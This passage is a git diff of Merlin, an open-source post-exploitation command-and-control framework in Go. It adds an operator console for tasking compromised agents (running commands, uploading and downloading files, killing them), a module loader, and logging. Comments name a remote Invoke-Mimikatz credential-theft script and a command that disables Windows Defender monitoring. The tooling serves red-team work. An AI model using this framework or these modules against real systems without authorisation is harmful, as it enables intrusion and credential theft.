+		s := Agents[agentID].channel
+		c := []string{cmdType}
+		c = append(c, cmd...)
+		s <- c
+		return nil
+	}
+	return errors.New("invalid agent ID")
+}
+
+// TODO turn this into a method of the agent struct
+
+// ShowInfo lists all of the agent's structure value in a table
+func ShowInfo(agentID uuid.UUID){
+
+	table := tablewriter.NewWriter(os.Stdout)
+	table.SetAlignment(tablewriter.ALIGN_LEFT)
+
+	data := [][]string{
+		{"ID", Agents[agentID].ID.String()},
+		{"Platform", Agents[agentID].Platform},
+		{"Architecture", Agents[agentID].Architecture},
+		{"UserName", Agents[agentID].UserName},
+		{"User GUID", Agents[agentID].UserGUID},
+		{"Hostname", Agents[agentID].HostName},
+		{"Process ID", strconv.Itoa(Agents[agentID].Pid)},
+		{"IP", fmt.Sprintf("%v", Agents[agentID].Ips)},
+		{"Initial Check In", Agents[agentID].iCheckIn.String()},
+		{"Last Check In", Agents[agentID].sCheckIn.String()},
+		{"Agent Version", Agents[agentID].Version},
+		{"Agent Build", Agents[agentID].Build},
+		{"Agent Wait Time", Agents[agentID].WaitTime},
+		{"Agent Wait Time Skew", fmt.Sprintf(strconv.FormatInt(Agents[agentID].Skew, 10))},
+		{"Agent Message Padding Max", strconv.Itoa(Agents[agentID].PaddingMax)},
+		{"Agent Max Retries", strconv.Itoa(Agents[agentID].MaxRetry)},
+		{"Agent Failed Logins", strconv.Itoa(Agents[agentID].FailedCheckin)},
+	}
+	table.AppendBulk(data)
+	fmt.Println()
+	table.Render()
+	fmt.Println()
+}
+
+// message is used to print a message to the command line
+func message (level string, message string) {
+	switch level {
+	case "info":
+		color.Cyan("[i]" + message)
+	case "note":
+		color.Yellow("[-]" + message)
+	case "warn":
+		color.Red("[!]" + message)
+	case "debug":
+		color.Red("[DEBUG]" + message)
+	case "success":
+		color.Green("[+]" + message)
+	default:
+		color.Red("[_-_]Invalid message level: " + message)
+	}
+}
+
+// TODO configure all message to be displayed on the CLI to be returned as errors and not written to the CLI here
\ No newline at end of file
diff --git a/pkg/banner/banner.go b/pkg/banner/banner.go
index 78fdfa89..b705ae64 100644
--- a/pkg/banner/banner.go
+++ b/pkg/banner/banner.go
@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
+// Copyright (C) 2018  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
diff --git a/pkg/cli/cli.go b/pkg/cli/cli.go
new file mode 100644
index 00000000..f26eeaaf
--- /dev/null
+++ b/pkg/cli/cli.go
@@ -0,0 +1,519 @@
+// Merlin is a post-exploitation command and control framework.
+// This file is part of Merlin.
+// Copyright (C) 2018  Russel Van Tuyl
+
+// Merlin is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// any later version.
+
+// Merlin is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.
+
+package cli
+
+import (
+	// Standard
+	"log"
+	"io"
+	"strings"
+	"os"
+	"os/exec"
+	"fmt"
+	"time"
+	"path"
+
+	// 3rd Party
+	"github.com/chzyer/readline"
+	"github.com/olekukonko/tablewriter"
+	"github.com/fatih/color"
+	"github.com/satori/go.uuid"
+
+	// Merlin
+	"github.com/Ne0nd0g/merlin/pkg"
+	"github.com/Ne0nd0g/merlin/pkg/modules"
+	"github.com/Ne0nd0g/merlin/pkg/core"
+	"github.com/Ne0nd0g/merlin/pkg/agents"
+	"github.com/Ne0nd0g/merlin/pkg/banner"
+)
+
+// Global Variables
+var serverLog *os.File
+var shellModule modules.Module
+var shellAgent uuid.UUID
+var prompt *readline.Instance
+var shellCompleter *readline.PrefixCompleter
+var shellMenuContext = "main"
+
+// Shell is the exported function to start the command line interface
+func Shell() {
+
+	shellCompleter = getCompleter("main")
+
+	p, err := readline.NewEx(&readline.Config{
+		Prompt:              "\033[31mMerlin»\033[0m ",
+		HistoryFile:         "/tmp/readline.tmp",
+		AutoComplete:        shellCompleter,
+		InterruptPrompt:     "^C",
+		EOFPrompt:           "exit",
+		HistorySearchFold:   true,
+		FuncFilterInputRune: filterInput,
+	})
+
+	if err != nil {
+		color.Red("[!]There was an error with the provided input")
+		color.Red(err.Error())
+	}
+	prompt = p
+	defer prompt.Close()
+
+	log.SetOutput(prompt.Stderr())
+
+	for {
+		line, err := prompt.Readline()
+		if err == readline.ErrInterrupt {
+			if len(line) == 0 {
+				break
+			} else {
+				continue
+			}
+		} else if err == io.EOF {
+			break
+		}
+
+		line = strings.TrimSpace(line)
+		cmd := strings.Fields(line)
+
+		if len(cmd) > 0 {
+			switch shellMenuContext {
+			case "main":
+				switch cmd[0] {
+				case "agent":
+					if len(cmd) > 1 {
+						menuAgent(cmd[1:])
+					}
+				case "banner":
+					color.Blue(banner.Banner1)
+					color.Blue("\t\t   Version: %s", merlin.Version)
+				case "help":
+					menuHelpMain()
+				case "?":
+					menuHelpMain()
+				case "exit":
+					exit()
+				case "interact":
+					if len(cmd) > 1 {
+						i := []string{"interact"}
+						i = append(i, cmd[1])
+						menuAgent(i)
+					}
+				case "quit":
+					exit()
+				case "sessions":
+					menuAgent([]string{"list"})
+				case "use":
+					menuUse(cmd[1:])
+				case "version":
+					color.Blue(fmt.Sprintf("Merlin version: %s", merlin.Version))
+				case "":
+				default:
+					message("info", "Executing system command...")
+					if len(cmd) > 1 {
+						executeCommand(cmd[0], cmd[1:])
+					} else {
+						var x []string
+						executeCommand(cmd[0], x)
+					}
+				}
+			case "module":
+				switch cmd[0] {
+				case "show":
+					if len(cmd) > 1{
+						switch cmd[1] {
+						case "info":
+							shellModule.ShowInfo()
+						case "options":
+							shellModule.ShowOptions()
+						}
+					}
+				case "set":
+					if len(cmd) > 2 {
+						if cmd[1] == "agent"{
+							s, err := shellModule.SetAgent(cmd[2])
+							if err != nil {message("warn", err.Error())} else {message("success", s)}
+						} else {
+							s, err := shellModule.SetOption(cmd[1], cmd[2])
+							if err != nil {message("warn", err.Error())} else {message("success", s)}
+						}
+					}
+				case "run":
+					r, err := shellModule.Run()
+					if err != nil {
+						message("warn", err.Error())
+					} else {
+						err := agents.AddChannel(shellModule.Agent, "cmd", r)
+						if err != nil {message("warn", err.Error())}
+					}
+				case "back":
+					menuSetMain()
+				case "main":
+					menuSetMain()
+				case "exit":
+					exit()
+				case "quit":
+					exit()
+				case "help":
+					menuHelpModule()
+				case "?":
+					menuHelpModule()
+				default:
+					message("info", "Executing system command...")
+					if len(cmd) > 1 {
+						executeCommand(cmd[0], cmd[1:])
+					} else {
+						var x []string
+						executeCommand(cmd[0], x)
+					}
+				}
+			case "agent":
+				switch cmd[0] {
+				case "back":
+					menuSetMain()
+				case "cmd":
+					if len(cmd) >1{
+						err := agents.AddChannel(shellAgent, "cmd", cmd[1:])
+						if err != nil {message("warn", err.Error())}
+					}
+				case "download":
+					if len(cmd) >1{
+						err := agents.AddChannel(shellAgent, "download", cmd[1:])
+						if err != nil {message("warn", err.Error())}
+					}
+				case "exit":
+					exit()
+				case "help":
+					menuHelpAgent()
+				case "?":
+					menuHelpAgent()
+				case "info":
+					agents.ShowInfo(shellAgent)
+				case "kill":
+					if len(cmd) >0{
+						err := agents.AddChannel(shellAgent, "kill", cmd[0:]);menuSetMain()
+						if err != nil {message("warn", err.Error())}
+					}
+				case "main":
+					menuSetMain()
+				case "quit":
+					exit()
+				case "set":
+					if len(cmd) >1{
+						switch cmd[1]{
+						case "maxretry":
+							if len(cmd) >2{
+								err := agents.AddChannel(shellAgent, "AgentControl", cmd[1:])
+								if err != nil {message("warn", err.Error())}
+							}
+						case "padding":
+							if len(cmd) >2{
+								err := agents.AddChannel(shellAgent, "AgentControl", cmd[1:])
+								if err != nil {message("warn", err.Error())}
+							}
+						case "sleep":
+							if len(cmd) >2{
+								err := agents.AddChannel(shellAgent, "AgentControl", cmd[1:])
+								if err != nil {message("warn", err.Error())}
+							}
+						case "skew":
+							if len(cmd) >2{
+								err := agents.AddChannel(shellAgent, "AgentControl", cmd[1:])
+								if err != nil {message("warn", err.Error())}
+							}
+						}
+					}
+				case "upload":
+					if len(cmd) >1{
+						agents.AddChannel(shellAgent, "upload", cmd[1:])
+						if err != nil {message("warn", err.Error())}
+					}
+				default:
+					message("info", "Executing system command...")
+					if len(cmd) > 1 {
+						executeCommand(cmd[0], cmd[1:])
+					} else {
+						var x []string
+						executeCommand(cmd[0], x)
+					}
+				}
+			}
+		}
+
+	}
+}
+
+func menuUse(cmd []string) {
+	switch cmd[0] {
+	case "module":
+		menuSetModule(cmd[1:])
+	case "":
+	default:
+		color.Yellow("[-]Invalid 'use' command")
+	}
+}
+
+func menuAgent(cmd []string){
+	switch cmd[0] {
+	case "list":
+		table := tablewriter.NewWriter(os.Stdout)
+		table.SetHeader([]string{"Agent GUID", "Platform", "User", "Host", "Transport"})
+		table.SetAlignment(tablewriter.ALIGN_CENTER)
+		for k, v := range agents.Agents {
+			table.Append([]string{k.String(), v.Platform + "/" + v.Architecture, v.UserName,
+				v.HostName, "HTTP/2"})
+		}
+		fmt.Println()
+		table.Render()
+		fmt.Println()
+	case "interact":
+		if len(cmd) > 1 {
+			i, errUUID := uuid.FromString(cmd[1])
+			if errUUID != nil {
+				message("warn", fmt.Sprintf("There was an error interacting with agent %s", cmd[1]))
+			} else {
+				menuSetAgent(i)
+			}
+		}
+	}
+}
+
+func menuSetAgent(agentID uuid.UUID) {
+	for k := range agents.Agents{
+		if agentID == agents.Agents[k].ID {
+			shellAgent = agentID
+			prompt.Config.AutoComplete = getCompleter("agent")
+			prompt.SetPrompt("\033[31mMerlin[\033[32magent\033[31m][\033[33m" + shellAgent.String() + "\033[31m]»\033[0m ")
+			shellMenuContext = "agent"
+		}
+	}
+}
+
+func menuSetModule(cmd []string) {
+	if len(cmd) > 0 {
+		var mPath = path.Join(core.CurrentDir, "data", "modules", cmd[0] + ".json")
+		s, errModule := modules.Create(mPath)
+		if errModule != nil {
+			message("warn", errModule.Error())
+		} else {
+			shellModule = s
+			prompt.Config.AutoComplete = getCompleter("module")
+			prompt.SetPrompt("\033[31mMerlin[\033[32mmodule\033[31m][\033[33m" + shellModule.Name + "\033[31m]»\033[0m ")
+			shellMenuContext = "module"
+		}
+	}
+}
+
+func menuSetMain(){
+	prompt.Config.AutoComplete = getCompleter("main")
+	prompt.SetPrompt("\033[31mMerlin»\033[0m ")
+	shellMenuContext = "main"
+}
+
+func getCompleter(completer string) *readline.PrefixCompleter {
+
+	// Main Menu Completer
+	var main = readline.NewPrefixCompleter(
+		readline.PcItem("agent",
+			readline.PcItem("list"),
+			readline.PcItem("interact",
+				readline.PcItemDynamic(agents.GetAgentList()),
+			),
+		),
+		readline.PcItem("banner"),
+		readline.PcItem("help"),
+		readline.PcItem("interact",
+			readline.PcItemDynamic(agents.GetAgentList()),
+		),
+		readline.PcItem("sessions"),
+		readline.PcItem("use",
+			readline.PcItem("module",
+				readline.PcItemDynamic(modules.GetModuleList()),
+			),
+		),
+		readline.PcItem("version"),
+	)
+
+
+	// Module Menu
+	var module = readline.NewPrefixCompleter(
+		readline.PcItem("back"),
+		readline.PcItem("help"),
+		readline.PcItem("main"),
+		readline.PcItem("run"),
+		readline.PcItem("show",
+			readline.PcItem("options"),
+			readline.PcItem("info"),
+		),
+		readline.PcItem("set",
+			readline.PcItem("agent",
+				readline.PcItem("all"),
+				readline.PcItemDynamic(agents.GetAgentList()),
+			),
+			readline.PcItemDynamic(shellModule.GetOptionsList()),
+		),
+	)
+
+	// Agent Menu
+	var agent = readline.NewPrefixCompleter(
+		readline.PcItem("cmd"),
+		readline.PcItem("back"),
+		readline.PcItem("download"),
+		readline.PcItem("help"),
+		readline.PcItem("info"),
+		readline.PcItem("kill"),
+		readline.PcItem("main"),
+		readline.PcItem("set",
+			readline.PcItem("maxretry"),
+			readline.PcItem("padding"),
+			readline.PcItem("skew"),
+			readline.PcItem("sleep"),
+		),
+		readline.PcItem("upload"),
+	)
+
+	switch completer {
+	case "main":
+		return main
+	case "module":
+		return module
+	case "agent":
+		return agent
+	default:
+		return main
+	}
+	return main
+}
+
+func menuHelpMain() {
+	color.Yellow("Merlin C2 Server (version %s)", merlin.Version)
+	table := tablewriter.NewWriter(os.Stdout)
+	table.SetAlignment(tablewriter.ALIGN_LEFT)
+	table.SetBorder(false)
+	table.SetHeader([]string{"Command", "Description", "Options"})
+
+	data := [][]string{
+		{"agent", "Interact with agents or list agents", "interact, list"},
+		{"banner", "Print the Merlin banner", ""},
+		{"exit", "Exit and close the Merlin server", ""},
+		{"interact", "Interact with an agent. Alias for Empire users", ""},
+		{"quit", "Exit and close the Merlin server", ""},
+		{"sessions", "List all agents session information. Alias for MSF users", ""},
+		{"use", "Use a function of Merlin", "module"},
+		{"version", "Print the Merlin server version", ""},
+		{"*", "Anything else will be execute on the host operating system", ""},
+	}
+
+	table.AppendBulk(data)
+	fmt.Println()
+	table.Render()
+	fmt.Println()
+}
+
+// The help menu while in the modules menu
+func menuHelpModule(){
+	table := tablewriter.NewWriter(os.Stdout)
+	table.SetAlignment(tablewriter.ALIGN_LEFT)
+	table.SetBorder(false)
+	// table.SetCaption(true, "Module Menu Help") // TODO Need to upgrade library first
+	table.SetHeader([]string{"Command", "Description", "Options"})
+
+	data := [][]string{
+		{"back", "Return to the main menu", ""},
+		{"main", "Return to the main menu", ""},
+		{"run","Run or execute the module", ""},
+		{"set", "Set the value for one of the module's options", "<option name> <option value>"},
+		{"show", "Show information about a module or its options", "info, options"},
+	}
+
+	table.AppendBulk(data)
+	fmt.Println()
+	table.Render()
+	fmt.Println()
+}
+
+// The help menu while in the agent menu
+func menuHelpAgent() {
+	table := tablewriter.NewWriter(os.Stdout)
+	table.SetAlignment(tablewriter.ALIGN_LEFT)
+	table.SetBorder(false)
+	// table.SetCaption(true, "Agent Menu Help") // TODO Need to upgrade library first
+	table.SetHeader([]string{"Command", "Description", "Options"})
+
+	data := [][]string{
+		{"cmd", "Execute a command on the agent", "cmd ping -c 3 8.8.8.8"},
+		{"back", "Return to the main menu", ""},
+		{"download","Download a file from the agent", "download <remote_file>"},
+		{"info", "Display all information about the agent", ""},
+		{"kill", "Instruct the agent to die or quit", ""},
+		{"main", "Return to the main menu", ""},
+		{"set", "Set the value for one of the agent's options", "maxretry, padding, skew, sleep"},
+		{"upload", "Upload a file to the agent", "upload <local_file> <remote_file>"},
+	}
+
+	table.AppendBulk(data)
+	fmt.Println()
+	table.Render()
+	fmt.Println()
+}
+
+func filterInput(r rune) (rune, bool) {
+	switch r {
+	// block CtrlZ feature
+	case readline.CharCtrlZ:
+		return r, false
+	}
+	return r, true
+}
+
+// Message is used to print a message to the command line
+func message (level string, message string) {
+	switch level {
+	case "info":
+		color.Cyan("[i]" + message)
+	case "note":
+		color.Yellow("[-]" + message)
+	case "warn":
+		color.Red("[!]" + message)
+	case "debug":
+		color.Red("[DEBUG]" + message)
+	case "success":
+		color.Green("[+]" + message)
+	default:
+		color.Red("[_-_]Invalid message level: " + message)
+	}
+}
+
+func exit(){
+	color.Red("[!]Quitting")
+	serverLog.WriteString(fmt.Sprintf("[%s]Shutting down Merlin Server due to user input", time.Now()))
+	os.Exit(0)
+}
+
+func executeCommand(name string, arg []string) {
+	var cmd *exec.Cmd
+
+	cmd = exec.Command(name, arg...)
+
+	out, err := cmd.CombinedOutput()
+
+	if err != nil {
+		message("warn", err.Error())
+	} else {
+		message("success", fmt.Sprintf("%s", out))
+	}
+}
+
diff --git a/pkg/core/core.go b/pkg/core/core.go
new file mode 100644
index 00000000..aa61ac71
--- /dev/null
+++ b/pkg/core/core.go
@@ -0,0 +1,59 @@
+// Merlin is a post-exploitation command and control framework.
+// This file is part of Merlin.
+// Copyright (C) 2018  Russel Van Tuyl
+
+// Merlin is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// any later version.
+
+// Merlin is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.
+
+package core
+
+import (
+	"os"
+	"time"
+	"math/rand"
+)
+
+// Debug puts Merlin into debug mode and displays debug messages
+var Debug = false
+// Verbose puts Merlin into verbose mode and displays verbose messages
+var Verbose = false
+// CurrentDir is the current directory where Merlin was executed from
+var CurrentDir, _ = os.Getwd()
+var src = rand.NewSource(time.Now().UnixNano())
+
+// Constants
+const (
+	letterIdxBits = 6                    // 6 bits to represent a letter index
+	letterIdxMask = 1<<letterIdxBits - 1 // All 1-bits, as many as letterIdxBits
+	letterIdxMax  = 63 / letterIdxBits   // # of letter indices fitting in 63 bits
+	letterBytes   = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
+)
+
+// RandStringBytesMaskImprSrc generates and returns a random string of n characters long
+func RandStringBytesMaskImprSrc(n int) string {
+	// http://stackoverflow.com/questions/22892120/how-to-generate-a-random-string-of-a-fixed-length-in-golang
+	b := make([]byte, n)
+	// A src.Int63() generates 63 random bits, enough for letterIdxMax characters!
+	for i, cache, remain := n-1, src.Int63(), letterIdxMax; i >= 0; {
+		if remain == 0 {
+			cache, remain = src.Int63(), letterIdxMax
+		}
+		if idx := int(cache & letterIdxMask); idx < len(letterBytes) {
+			b[i] = letterBytes[idx]
+			i--
+		}
+		cache >>= letterIdxBits
+		remain--
+	}
+	return string(b)
+}
\ No newline at end of file
diff --git a/pkg/logging/logging.go b/pkg/logging/logging.go
new file mode 100644
index 00000000..2df56c89
--- /dev/null
+++ b/pkg/logging/logging.go
@@ -0,0 +1,77 @@
+// Merlin is a post-exploitation command and control framework.
+// This file is part of Merlin.
+// Copyright (C) 2018  Russel Van Tuyl
+
+// Merlin is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// any later version.
+
+// Merlin is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.
+
+package logging
+
+import (
+	// Standard
+	"os"
+	"path/filepath"
+	"fmt"
+	"time"
+	
+	// 3rd Party
+	"github.com/fatih/color"
+
+	// Merlin
+	"github.com/Ne0nd0g/merlin/pkg/core"
+)
+
+var serverLog *os.File
+
+func init() {
+
+	// Server Logging
+	if _, err := os.Stat(filepath.Join(core.CurrentDir, "data", "log", "merlinServerLog.txt")); os.IsNotExist(err) {
+		os.Mkdir(filepath.Join(core.CurrentDir, "data", "log"), os.ModeDir)
+		os.Create(filepath.Join(core.CurrentDir, "data", "log", "merlinServerLog.txt"))
+		if core.Debug {
+			message("debug", fmt.Sprintf("Created server log file at: %s\\data\\log\\merlinServerLog.txt", core.CurrentDir))
+		}
+	}
+	var errLog error
+	serverLog, errLog = os.OpenFile(filepath.Join(core.CurrentDir, "data", "log", "merlinServerLog.txt"), os.O_APPEND|os.O_WRONLY, 0600)
+	if errLog != nil {
+		message("warn", "There was an error with the Merlin Server log file")
+		message("warn", errLog.Error())
+	}
+}
+
+// Server writes a log entry into the server's log file
+func Server(logMessage string){
+	serverLog.WriteString(fmt.Sprintf("[%s]%s\r\n", logMessage, time.Now()))
+}
+
+// Message is used to print a message to the command line
+func message (level string, message string) {
+	switch level {
+	case "info":
+		color.Cyan("[i]" + message)
+	case "note":
+		color.Yellow("[-]" + message)
+	case "warn":
+		color.Red("[!]" + message)
+	case "debug":
+		color.Red("[DEBUG]" + message)
+	case "success":
+		color.Green("[+]" + message)
+	default:
+		color.Red("[_-_]Invalid message level: " + message)
+	}
+}
+
+// TODO configure all message to be displayed on the CLI to be returned as errors and not written to the CLI here
\ No newline at end of file
diff --git a/pkg/merlin.go b/pkg/merlin.go
index 0709f350..9013ced6 100644
--- a/pkg/merlin.go
+++ b/pkg/merlin.go
@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
+// Copyright (C) 2018  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -18,4 +18,4 @@
 package merlin
 
 // Version is a constant variable containing the version number for the Merlin package
-const Version = "0.1.3 Beta"
+const Version = "0.1.4 Beta"
diff --git a/pkg/messages/messages.go b/pkg/messages/messages.go
index 07c3eb08..6cb68b90 100644
--- a/pkg/messages/messages.go
+++ b/pkg/messages/messages.go
@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
+// Copyright (C) 2018  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -30,6 +30,14 @@ type Base struct {
 	Padding string      `json:"padding"`
 }
 
+// FileTransfer is the JSON payload to transfer files between the server and agent
+type FileTransfer struct {
+	FileLocation    string `json:"dest"`
+	FileBlob 		string `json:"blob"`
+	IsDownload		bool `json:download`
+	Job      		string `json:"job"`
+}
+
 // CmdPayload is the JSON payload for commands to execute on an agent
 type CmdPayload struct {
 	Command string `json:"executable"`
@@ -39,12 +47,13 @@ type CmdPayload struct {
 
 // SysInfo is a JSON payload containing information about the system where the agent is running
 type SysInfo struct {
-	Platform     string `json:"platform,omitempty"`
-	Architecture string `json:"architecture,omitempty"`
-	UserName     string `json:"username,omitempty"`
-	UserGUID     string `json:"userguid,omitempty"`
-	HostName     string `json:"hostname,omitempty"`
-	Pid          int    `json:"pid,omitempty"`
+	Platform     string   `json:"platform,omitempty"`
+	Architecture string   `json:"architecture,omitempty"`
+	UserName     string   `json:"username,omitempty"`
+	UserGUID     string   `json:"userguid,omitempty"`
+	HostName     string   `json:"hostname,omitempty"`
+	Pid          int      `json:"pid,omitempty"`
+	Ips          []string `json:"ips,omitempty"`
 }
 
 // CmdResults is a JSON payload that contains the results of an executed command from an agent
@@ -71,4 +80,5 @@ type AgentInfo struct {
 	PaddingMax    int    `json:"paddingmax,omitempty"`
 	MaxRetry      int    `json:"maxretry,omitempty"`
 	FailedCheckin int    `json:"failedcheckin,omitempty"`
+	Skew		  int64	 `json:"skew,omitempty"`
 }
diff --git a/pkg/modules/modules.go b/pkg/modules/modules.go
index d06c3915..c1caa46f 100644
--- a/pkg/modules/modules.go
+++ b/pkg/modules/modules.go
@@ -1,6 +1,6 @@
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
+// Copyright (C) 2018  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -17,13 +17,283 @@
 
 package modules
 
+import (
+	// Standard
+	"fmt"
+	"io/ioutil"
+	"encoding/json"
+	"strings"
+	"errors"
+	"os"
+	"strconv"
+	"path"
+	"path/filepath"
+
+	// 3rd Party
+	"github.com/fatih/color"
+	"github.com/olekukonko/tablewriter"
+	"github.com/satori/go.uuid"
+
+	// Merlin
+	"github.com/Ne0nd0g/merlin/pkg/core"
+)
+
 // Module is a structure containing the base information or template for modules
 type Module struct {
-	Name     string
-	Author   []string
-	Path     string
-	Platform string
-	Arch     string
-	Lang     string
-	Notes    string
+	Agent 	 uuid.UUID // The Agent that will later be associated with this module prior to execution
+	Name     string  	`json:"name"` 	// Name of the module
+	Author   []string 	`json:"author"`	// A list of module authors
+	Path     []string 	`json:"path"`	// Path to the module (i.e. data/modules/powershell/powerview)
+	Platform string 	`json:"platform"`	// Platform the module can run on (i.e. Windows, Linux, Darwin, or ALL)
+	Arch     string 	`json:"arch"`	// The Architecture the module can run on (i.e. x86, x64, MIPS, ARM, or ALL)
+	Lang     string 	`json:"lang"`	// What language does the module execute in (i.e. PowerShell, Python, or Perl)
+	Priv     bool		`json:"privilege"` // Does this module required a privileged level account like root or SYSTEM?
+	Description string 	`json:"description"`	// A description of what the module does
+	Notes    string 	`json:"notes"`	// Additional information or notes about the module
+	Commands []string 	`json:"commands"`	// A list of commands to be run on the agent
+	SourceRemote string `json:"remote"`	// Online or remote source code for a module (i.e. https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1)
+	SourceLocal	[]string 	`json:"local"`	// The local file path to the script or payload
+	Options []Option 	`json:"options"`	// A list of configurable options/arguments for the module
+	Powershell interface{} `json:"powershell,omitempty"` // An option json object containing commands and configuration items specific to PowerShell
 }
+
+// Option is a structure containing the keys for the object
+type Option struct {
+	Name 		string		`json:"name"` 		// Name of the option
+	Value 		string		`json:"value"` 		// Value of the option
+	Required 	bool		`json:"required"` 	// Is this a required option?
+	Flag 		string		`json:"flag"`		// The command line flag used for the option
+	Description string		`json:"description"`// A description of the option
+}
+
+// PowerShell structure is used to describe additional PowerShell features for modules that leverage PowerShell
+type PowerShell struct {
+	DisableAV bool // Disable Windows Real Time "Set-MpPreference -DisableRealtimeMonitoring $true"
+	Obfuscation bool // Unimplemented command to obfuscated powershell
+	Base64 bool // Base64 encode the powershell command?
+}
+
+// Run function returns an array of commands to execute the module on an agent
+func (m *Module) Run() ([]string, error) {
+	if m.Agent == uuid.FromStringOrNil("00000000-0000-0000-0000-000000000000") {
+		return nil, errors.New("agent not set for module")
+	}
+
+	// Check every 'required' option to make sure it isn't null
+	for _, v := range m.Options {
+		if v.Required {
+			if v.Value == "" {
+				return nil, errors.New(v.Name + " is required")
+			}
+		}
+	}
+
+	// Fill in or remove options values
+	command := make([]string, len(m.Commands))
+	copy(command, m.Commands)
+
+	for k := len(command) - 1; k >= 0; k-- {
+		for _, o := range m.Options {
+			if o.Value != "" && strings.Contains(command[k], "{{" + o.Name + "}}" ){
+				command[k] = strings.Replace(command[k], "{{" + o.Name + "}}", o.Flag + " " + o.Value, -1)
+			} else if o.Value == "" && strings.Contains(command[k], "{{" + o.Name + "}}"){
+				command = append(command[:k], command[k+1:]...)
+			} else if strings.ToLower(o.Value) == "true" && strings.Contains(command[k], "{{" + o.Name + ".Flag}}" ){
+				command[k] = strings.Replace(command[k], "{{" + o.Name + ".Flag}}", o.Flag, -1)
+			} else if strings.ToLower(o.Value) != "true" && strings.Contains(command[k], "{{" + o.Name + ".Flag}}" ){
+				command = append(command[:k], command[k+1:]...)
+			} else if o.Value != "" && strings.Contains(command[k], "{{" + o.Name + ".Value}}" ){
+				command[k] = strings.Replace(command[k], "{{" + o.Name + ".Value}}", o.Value, -1)
+			} else if o.Value == "" && strings.Contains(command[k], "{{" + o.Name + ".Value}}"){
+				command = append(command[:k], command[k+1:]...)
+			}
+		}
+	}
+	return command, nil
+}
+
+// ShowOptions function is used to display only a module's configurable options
+func (m *Module) ShowOptions(){
+	color.Cyan(fmt.Sprintf("\r\nAgent: %s\r\n", m.Agent.String()))
+	color.Yellow("\r\nModule options(" + m.Name + ")\r\n\r\n")
+	table := tablewriter.NewWriter(os.Stdout)
+	table.SetHeader([]string{"Name", "Value", "Required", "Description"})
+	// TODO update the tablewriter to the newest version and use the SetColMinWidth for the Description column
+	table.SetBorder(false)
+
+	for _, v := range m.Options {
+		table.Append([]string{v.Name, v.Value, strconv.FormatBool(v.Required), v.Description})
+	}
+	table.Render()
+}
+
+// GetOptionsList generates and returns a list of the module's configurable options. Used with tab completion
+func (m *Module) GetOptionsList() func(string) []string {
+	return func(line string) []string {
+		o := make([]string, 0)
+		for _, v := range m.Options {
+			o = append(o, v.Name)
+		}
+		return o
+	}
+}
+
+// GetModuleList generates and returns a list of all modules in Merlin's "module" directory folder. Used with tab completion
+func GetModuleList() func(string) []string {
+	return func(line string) []string {
+		ModuleDir := path.Join(filepath.ToSlash(core.CurrentDir), "data", "modules")
+		o := make([]string, 0)
+
+		err := filepath.Walk(ModuleDir, func(path string, f os.FileInfo, err error) error {
+			if err != nil {
+				fmt.Printf("prevent panic by handling failure accessing a path %q: %v\n", ModuleDir, err)
+				return err
+			}
+			if strings.HasSuffix(f.Name(), ".json"){
+				d := strings.SplitAfter(filepath.ToSlash(path), ModuleDir)
+				if len(d) > 0 {
+					m := d[1]
+					m = strings.TrimLeft(m, "/")
+					m = strings.TrimRight(m, ".json")
+					if !strings.Contains(m, "templates"){
+						o = append(o, m)
+					}
+				}
+			}
+			return nil
+		})
+		if err != nil {fmt.Printf("error walking the path %q: %v\n", ModuleDir, err)}
+		return o
+	}
+}
+
+// SetOption is used to change the passed in module option's value. Used when a user is configuring a module
+func (m *Module) SetOption(option string, value string) (string, error){
+	// Verify this option exists
+	for k, v := range m.Options {
+		if option == v.Name {
+			m.Options[k].Value = value
+			return fmt.Sprintf("%s set to %s", v.Name, v.Value), nil
+		}
+	}
+	return "", fmt.Errorf("invalid module option: %s", option)
+}
+
+// SetAgent is used to set the agent associated with the module.
+func (m *Module) SetAgent(agentUUID string) (string, error){
+	if strings.ToLower(agentUUID) == "all"{
+		agentUUID = "ffffffff-ffff-ffff-ffff-ffffffffffff"
+	}
+	i, err := uuid.FromString(agentUUID)
+	if err != nil {
+		return "", fmt.Errorf("invalid UUID")
+	}
+	m.Agent = i
+	return fmt.Sprintf("agent set to %s", m.Agent.String()), nil
+}
+
+// ShowInfo function displays all of the information about a module to include items such as authors and options
